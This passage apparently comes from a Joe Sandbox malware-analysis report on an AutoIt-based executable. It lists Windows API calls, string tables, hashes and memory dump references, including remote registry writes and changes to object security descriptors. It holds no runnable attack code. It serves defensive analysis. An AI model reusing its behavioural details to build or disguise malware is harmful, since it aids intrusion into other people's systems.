        • Opcode Fuzzy Hash: b7bd14140c10ec6aaddf79b9d08c98483c356778f297cad41de44428f986f42c
        • Instruction Fuzzy Hash: 85B15D71A10605AFEB14DF78EC89FAEBBA9EF48710F104258F915E7290D770AD50CBA0
        APIs
        • SetErrorMode.KERNEL32(00000001), ref: 00254AED
        • GetDriveTypeW.KERNEL32(?,0027CB68,?,\\.\,0027CC08), ref: 00254BCA
        • SetErrorMode.KERNEL32(00000000,0027CB68,?,\\.\,0027CC08), ref: 00254D36
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorMode$DriveType
        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
        • API String ID: 2907320926-4222207086
        • Opcode ID: cbd182dd935ba4a02ec739d1d4f532b079a093815c0b64cbc76eb5179876ff1c
        • Instruction ID: 10ea7f284131987e3e3361fb1734332197813f3543c505b63f25dd19210a5efa
        • Opcode Fuzzy Hash: cbd182dd935ba4a02ec739d1d4f532b079a093815c0b64cbc76eb5179876ff1c
        • Instruction Fuzzy Hash: 4F610630635506ABCB04FF24C98596CF7B1AB8634BB284116FC06AB291CF71DDE9DB49
        APIs
        • GetSysColor.USER32(00000012), ref: 00277421
        • SetTextColor.GDI32(?,?), ref: 00277425
        • GetSysColorBrush.USER32(0000000F), ref: 0027743B
        • GetSysColor.USER32(0000000F), ref: 00277446
        • CreateSolidBrush.GDI32(?), ref: 0027744B
        • GetSysColor.USER32(00000011), ref: 00277463
        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00277471
        • SelectObject.GDI32(?,00000000), ref: 00277482
        • SetBkColor.GDI32(?,00000000), ref: 0027748B
        • SelectObject.GDI32(?,?), ref: 00277498
        • InflateRect.USER32(?,000000FF,000000FF), ref: 002774B7
        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002774CE
        • GetWindowLongW.USER32(00000000,000000F0), ref: 002774DB
        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0027752A
        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00277554
        • InflateRect.USER32(?,000000FD,000000FD), ref: 00277572
        • DrawFocusRect.USER32(?,?), ref: 0027757D
        • GetSysColor.USER32(00000011), ref: 0027758E
        • SetTextColor.GDI32(?,00000000), ref: 00277596
        • DrawTextW.USER32(?,002770F5,000000FF,?,00000000), ref: 002775A8
        • SelectObject.GDI32(?,?), ref: 002775BF
        • DeleteObject.GDI32(?), ref: 002775CA
        • SelectObject.GDI32(?,?), ref: 002775D0
        • DeleteObject.GDI32(?), ref: 002775D5
        • SetTextColor.GDI32(?,?), ref: 002775DB
        • SetBkColor.GDI32(?,?), ref: 002775E5
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
        • String ID:
        • API String ID: 1996641542-0
        • Opcode ID: b18dbc89fade8d16cf162df1466a4a4921d73c729574caa836a16c4ec912b230
        • Instruction ID: 1a18e159cb52d83d0d52bb0d07567f01f83afe5f4964d7d30fa5b87bf98fda8e
        • Opcode Fuzzy Hash: b18dbc89fade8d16cf162df1466a4a4921d73c729574caa836a16c4ec912b230
        • Instruction Fuzzy Hash: F8614272900219AFDF119FA4DC49AEE7F79EB08320F218125F919B72A1D7759990CF90
        APIs
        • GetCursorPos.USER32(?), ref: 00271128
        • GetDesktopWindow.USER32 ref: 0027113D
        • GetWindowRect.USER32(00000000), ref: 00271144
        • GetWindowLongW.USER32(?,000000F0), ref: 00271199
        • DestroyWindow.USER32(?), ref: 002711B9
        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002711ED
        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0027120B
        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0027121D
        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00271232
        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00271245
        • IsWindowVisible.USER32(00000000), ref: 002712A1
        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002712BC
        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002712D0
        • GetWindowRect.USER32(00000000,?), ref: 002712E8
        • MonitorFromPoint.USER32(?,?,00000002), ref: 0027130E
        • GetMonitorInfoW.USER32(00000000,?), ref: 00271328
        • CopyRect.USER32(?,?), ref: 0027133F
        • SendMessageW.USER32(00000000,00000412,00000000), ref: 002713AA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
        • String ID: ($0$tooltips_class32
        • API String ID: 698492251-4156429822
        • Opcode ID: b41b1344c0fb157a5fa8c660e754e33779751ae2c0eaf71af8099822ef27fdfa
        • Instruction ID: c4019239c460d443752776e00630d213cdf5a3da24cfb16ff920b9dfbc50a74e
        • Opcode Fuzzy Hash: b41b1344c0fb157a5fa8c660e754e33779751ae2c0eaf71af8099822ef27fdfa
        • Instruction Fuzzy Hash: 02B18971618341AFD704DF69D889B6EBBE4EF84310F00891CF99D9B2A1CB71E864CB91
        APIs
        • CharUpperBuffW.USER32(?,?), ref: 002702E5
        • _wcslen.LIBCMT ref: 0027031F
        • _wcslen.LIBCMT ref: 00270389
        • _wcslen.LIBCMT ref: 002703F1
        • _wcslen.LIBCMT ref: 00270475
        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002704C5
        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00270504
          • Part of subcall function 001FF9F2: _wcslen.LIBCMT ref: 001FF9FD
          • Part of subcall function 0024223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00242258
          • Part of subcall function 0024223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0024228A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$MessageSend$BuffCharUpper
        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
        • API String ID: 1103490817-719923060
        • Opcode ID: 00745d47c24457dfcb04d4562a7dee7d671b23ed5f663239ab589f5b35b729a4
        • Instruction ID: 399f1b9f37ac3a7e353928746708e00fec25ddea3c5f99ddb24fa06f2298bf68
        • Opcode Fuzzy Hash: 00745d47c24457dfcb04d4562a7dee7d671b23ed5f663239ab589f5b35b729a4
        • Instruction Fuzzy Hash: 7FE1C131228642DFC714DF25C89083EB3E6BF98314F54895DF89A9B2A1DB70ED5ACB41
        APIs
        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001F8968
        • GetSystemMetrics.USER32(00000007), ref: 001F8970
        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001F899B
        • GetSystemMetrics.USER32(00000008), ref: 001F89A3
        • GetSystemMetrics.USER32(00000004), ref: 001F89C8
        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001F89E5
        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001F89F5
        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001F8A28
        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001F8A3C
        • GetClientRect.USER32(00000000,000000FF), ref: 001F8A5A
        • GetStockObject.GDI32(00000011), ref: 001F8A76
        • SendMessageW.USER32(00000000,00000030,00000000), ref: 001F8A81
          • Part of subcall function 001F912D: GetCursorPos.USER32(?), ref: 001F9141
          • Part of subcall function 001F912D: ScreenToClient.USER32(00000000,?), ref: 001F915E
          • Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000001), ref: 001F9183
          • Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000002), ref: 001F919D
        • SetTimer.USER32(00000000,00000000,00000028,001F90FC), ref: 001F8AA8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
        • String ID: AutoIt v3 GUI
        • API String ID: 1458621304-248962490
        • Opcode ID: c6637f69d4647756d41f2057755c2a985441f89b2002950665831bae911ddc71
        • Instruction ID: b99d2fbe9adc8aa6a58c7610a5e5b34fb010e9589eccb71702b933bcb433b4c5
        • Opcode Fuzzy Hash: c6637f69d4647756d41f2057755c2a985441f89b2002950665831bae911ddc71
        • Instruction Fuzzy Hash: EEB18F71A0020AAFDF14DFA8DC99BAE7BB5FB48314F504229FA15A7290DB70E951CF50
        APIs
          • Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00241114
          • Part of subcall function 002410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241120
          • Part of subcall function 002410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 0024112F
          • Part of subcall function 002410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241136
          • Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0024114D
        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00240DF5
        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00240E29
        • GetLengthSid.ADVAPI32(?), ref: 00240E40
        • GetAce.ADVAPI32(?,00000000,?), ref: 00240E7A
        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00240E96
        • GetLengthSid.ADVAPI32(?), ref: 00240EAD
        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00240EB5
        • HeapAlloc.KERNEL32(00000000), ref: 00240EBC
        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00240EDD
        • CopySid.ADVAPI32(00000000), ref: 00240EE4
        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00240F13
        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00240F35
        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00240F47
        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240F6E
        • HeapFree.KERNEL32(00000000), ref: 00240F75
        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240F7E
        • HeapFree.KERNEL32(00000000), ref: 00240F85
        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240F8E
        • HeapFree.KERNEL32(00000000), ref: 00240F95
        • GetProcessHeap.KERNEL32(00000000,?), ref: 00240FA1
        • HeapFree.KERNEL32(00000000), ref: 00240FA8
          • Part of subcall function 00241193: GetProcessHeap.KERNEL32(00000008,00240BB1,?,00000000,?,00240BB1,?), ref: 002411A1
          • Part of subcall function 00241193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00240BB1,?), ref: 002411A8
          • Part of subcall function 00241193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00240BB1,?), ref: 002411B7
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
        • String ID:
        • API String ID: 4175595110-0
        • Opcode ID: 8163d1e0961e552981dc9cd53e557a847dc6d3290f9e41dfc0923efd14e73255
        • Instruction ID: 844cb7ce119d0f924cd2717cd09126afe22d29fea8ab4fb2c72aa41157c73310
        • Opcode Fuzzy Hash: 8163d1e0961e552981dc9cd53e557a847dc6d3290f9e41dfc0923efd14e73255
        • Instruction Fuzzy Hash: FB71817191020AEFDF249FA4EC88FAEBBB8BF04300F154129FA19E7151DB749995CB60
        APIs
        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026C4BD
        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0027CC08,00000000,?,00000000,?,?), ref: 0026C544
        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0026C5A4
        • _wcslen.LIBCMT ref: 0026C5F4
        • _wcslen.LIBCMT ref: 0026C66F
        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0026C6B2
        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0026C7C1
        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0026C84D
        • RegCloseKey.ADVAPI32(?), ref: 0026C881
        • RegCloseKey.ADVAPI32(00000000), ref: 0026C88E
        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0026C960
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
        • API String ID: 9721498-966354055
        • Opcode ID: fbd5d92ade7c10441255ff35962c9426a44fb753d4cbdb38eef5df74aa1a4cb8
        • Instruction ID: 85c25fc2b1cf179ba6688924edd7abfd552ccbaa937da0f659ce011b7640c637
        • Opcode Fuzzy Hash: fbd5d92ade7c10441255ff35962c9426a44fb753d4cbdb38eef5df74aa1a4cb8
        • Instruction Fuzzy Hash: A11278352146419FD715EF25D881A2EB7E5FF88714F24885CF88A9B3A2DB31EC91CB81
        APIs
        • CharUpperBuffW.USER32(?,?), ref: 002709C6
        • _wcslen.LIBCMT ref: 00270A01
        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00270A54
        • _wcslen.LIBCMT ref: 00270A8A
        • _wcslen.LIBCMT ref: 00270B06
        • _wcslen.LIBCMT ref: 00270B81
          • Part of subcall function 001FF9F2: _wcslen.LIBCMT ref: 001FF9FD
          • Part of subcall function 00242BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00242BFA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$MessageSend$BuffCharUpper
        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
        • API String ID: 1103490817-4258414348
        • Opcode ID: 398d37a60e56f685dcdc4405eccee05ccf54befd31dbb34301d8474338d6941d
        • Instruction ID: 8db3f30f393a80d044297816b6870e1c01fbe41c3888b1f3ce405ba42e82e8e4
        • Opcode Fuzzy Hash: 398d37a60e56f685dcdc4405eccee05ccf54befd31dbb34301d8474338d6941d
        • Instruction Fuzzy Hash: E0E18C31228742CFC714DF25C49092AB7E1BF99318F14895DF89A5B3A2DB70ED59CB81
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$BuffCharUpper
        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
        • API String ID: 1256254125-909552448
        • Opcode ID: 154293fd3cfd3bb272d0ec6e87564c6241eecc4d3d18c656862df24af12ecd53
        • Instruction ID: 47aecdf934533dd73ab1c720f64670f48ff2241af890fb34112f3b490cbf8136
        • Opcode Fuzzy Hash: 154293fd3cfd3bb272d0ec6e87564c6241eecc4d3d18c656862df24af12ecd53
        • Instruction Fuzzy Hash: 0A71F43263016B8BCB20FEBCCC515BE3395AF61754B350129F89697285EA71CDE583A0
        APIs
        • _wcslen.LIBCMT ref: 0027835A
        • _wcslen.LIBCMT ref: 0027836E
        • _wcslen.LIBCMT ref: 00278391
        • _wcslen.LIBCMT ref: 002783B4
        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002783F2
        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00275BF2), ref: 0027844E
        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00278487
        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002784CA
        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00278501
        • FreeLibrary.KERNEL32(?), ref: 0027850D
        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0027851D
        • DestroyIcon.USER32(?,?,?,?,?,00275BF2), ref: 0027852C
        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00278549
        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00278555
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
        • String ID: .dll$.exe$.icl
        • API String ID: 799131459-1154884017
        • Opcode ID: f5edcdf25447a6c1f938239bdce72f9eada78d33961c3a2e416823200c396283
        • Instruction ID: 25cf5900664c83f6abc49e2b811296243304997e97e13b8d3518b03fd76f6e04
        • Opcode Fuzzy Hash: f5edcdf25447a6c1f938239bdce72f9eada78d33961c3a2e416823200c396283
        • Instruction Fuzzy Hash: 3A61E2B1560606BAEB14DF74DC89BBF77A8BF04711F108509F919D60D1DFB4A9A0CBA0
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
        • API String ID: 0-1645009161
        • Opcode ID: 51db1687b9784e040a1c0044ef83f635996f375c5e5b6297405e9e522501a450
        • Instruction ID: 91dca887424ef2019ec5c0c91a348952392117925ebba6d9982282a183079fe9
        • Opcode Fuzzy Hash: 51db1687b9784e040a1c0044ef83f635996f375c5e5b6297405e9e522501a450
        • Instruction Fuzzy Hash: D181FB71A14A15BBEB25AFA1DC46FBF3768AF15300F048024FD09AB1D6EB70D961CB91
        APIs
        • LoadIconW.USER32(00000063), ref: 00245A2E
        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00245A40
        • SetWindowTextW.USER32(?,?), ref: 00245A57
        • GetDlgItem.USER32(?,000003EA), ref: 00245A6C
        • SetWindowTextW.USER32(00000000,?), ref: 00245A72
        • GetDlgItem.USER32(?,000003E9), ref: 00245A82
        • SetWindowTextW.USER32(00000000,?), ref: 00245A88
        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00245AA9
        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00245AC3
        • GetWindowRect.USER32(?,?), ref: 00245ACC
        • _wcslen.LIBCMT ref: 00245B33
        • SetWindowTextW.USER32(?,?), ref: 00245B6F
        • GetDesktopWindow.USER32 ref: 00245B75
        • GetWindowRect.USER32(00000000), ref: 00245B7C
        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00245BD3
        • GetClientRect.USER32(?,?), ref: 00245BE0
        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00245C05
        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00245C2F
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
        • String ID:
        • API String ID: 895679908-0
        • Opcode ID: 5712d1fa20faf658ad0a6137c1a8100bbabd3e8fb2d204cd0ab6d8f050f52dec
        • Instruction ID: 62b2efcacafa0f9f2e25ea43bc8fdceae98f3ed3daa1d08de939c61821214c26
        • Opcode Fuzzy Hash: 5712d1fa20faf658ad0a6137c1a8100bbabd3e8fb2d204cd0ab6d8f050f52dec
        • Instruction Fuzzy Hash: D2719C31910B1AAFCB24DFA8CE89AAEBBF5FF48704F10451CE586A25A5D770E950CF50
        APIs
        • LoadCursorW.USER32(00000000,00007F89), ref: 0025FE27
        • LoadCursorW.USER32(00000000,00007F8A), ref: 0025FE32
        • LoadCursorW.USER32(00000000,00007F00), ref: 0025FE3D
        • LoadCursorW.USER32(00000000,00007F03), ref: 0025FE48
        • LoadCursorW.USER32(00000000,00007F8B), ref: 0025FE53
        • LoadCursorW.USER32(00000000,00007F01), ref: 0025FE5E
        • LoadCursorW.USER32(00000000,00007F81), ref: 0025FE69
        • LoadCursorW.USER32(00000000,00007F88), ref: 0025FE74
        • LoadCursorW.USER32(00000000,00007F80), ref: 0025FE7F
        • LoadCursorW.USER32(00000000,00007F86), ref: 0025FE8A
        • LoadCursorW.USER32(00000000,00007F83), ref: 0025FE95
        • LoadCursorW.USER32(00000000,00007F85), ref: 0025FEA0
        • LoadCursorW.USER32(00000000,00007F82), ref: 0025FEAB
        • LoadCursorW.USER32(00000000,00007F84), ref: 0025FEB6
        • LoadCursorW.USER32(00000000,00007F04), ref: 0025FEC1
